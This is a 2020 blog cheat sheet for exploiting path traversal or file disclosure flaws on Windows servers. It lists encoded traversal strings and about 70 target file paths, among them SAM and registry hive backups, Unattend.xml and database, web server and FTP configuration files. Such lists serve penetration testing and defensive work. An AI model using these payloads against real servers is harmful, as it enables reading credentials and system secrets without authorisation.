Path Traversal Cheat Sheet: Windows

14 February 2020 - Articles
Back

Got a path/directory traversal or file disclosure vulnerability on a Windows-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know!

The list included below contains absolute file paths, remember if you have a traversal attack you can prefix these with encoding traversal strings, like these:

../ 
..\ 
..\/ 
%2e%2e%2f 
%252e%252e%252f 
%c0%ae%c0%ae%c0%af 
%uff0e%uff0e%u2215 
%uff0e%uff0e%u2216 
..././ 
....\

File Disclosure Cheat Sheet

C:/Users/Administrator/NTUser.dat 
C:/Documents and Settings/Administrator/NTUser.dat 
C:/apache/logs/access.log 
C:/apache/logs/error.log 
C:/apache/php/php.ini 
C:/boot.ini 
C:/inetpub/wwwroot/global.asa 
C:/MySQL/data/hostname.err 
C:/MySQL/data/mysql.err 
C:/MySQL/data/mysql.log 
C:/MySQL/my.cnf 
C:/MySQL/my.ini 
C:/php4/php.ini 
C:/php5/php.ini 
C:/php/php.ini 
C:/Program Files/Apache Group/Apache2/conf/httpd.conf 
C:/Program Files/Apache Group/Apache/conf/httpd.conf 
C:/Program Files/Apache Group/Apache/logs/access.log 
C:/Program Files/Apache Group/Apache/logs/error.log 
C:/Program Files/FileZilla Server/FileZilla Server.xml 
C:/Program Files/MySQL/data/hostname.err 
C:/Program Files/MySQL/data/mysql-bin.log 
C:/Program Files/MySQL/data/mysql.err 
C:/Program Files/MySQL/data/mysql.log 
C:/Program Files/MySQL/my.ini 
C:/Program Files/MySQL/my.cnf 
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err 
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf 
C:/Program Files/MySQL/MySQL Server 5.0/my.ini 
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
C:/WINDOWS/php.ini 
C:/WINDOWS/Repair/SAM 
C:/Windows/repair/system 
C:/Windows/repair/software 
C:/Windows/repair/security 
C:/WINDOWS/System32/drivers/etc/hosts 
C:/Windows/win.ini 
C:/WINNT/php.ini 
C:/WINNT/win.ini 
C:/xampp/apache/bin/php.ini 
C:/xampp/apache/logs/access.log 
C:/xampp/apache/logs/error.log 
C:/Windows/Panther/Unattend/Unattended.xml 
C:/Windows/Panther/Unattended.xml 
C:/Windows/debug/NetSetup.log 
C:/Windows/system32/config/AppEvent.Evt 
C:/Windows/system32/config/SecEvent.Evt 
C:/Windows/system32/config/default.sav 
C:/Windows/system32/config/security.sav 
C:/Windows/system32/config/software.sav 
C:/Windows/system32/config/system.sav 
C:/Windows/system32/config/regback/default 
C:/Windows/system32/config/regback/sam 
C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software 
C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
Play Cover Track Title
Track Authors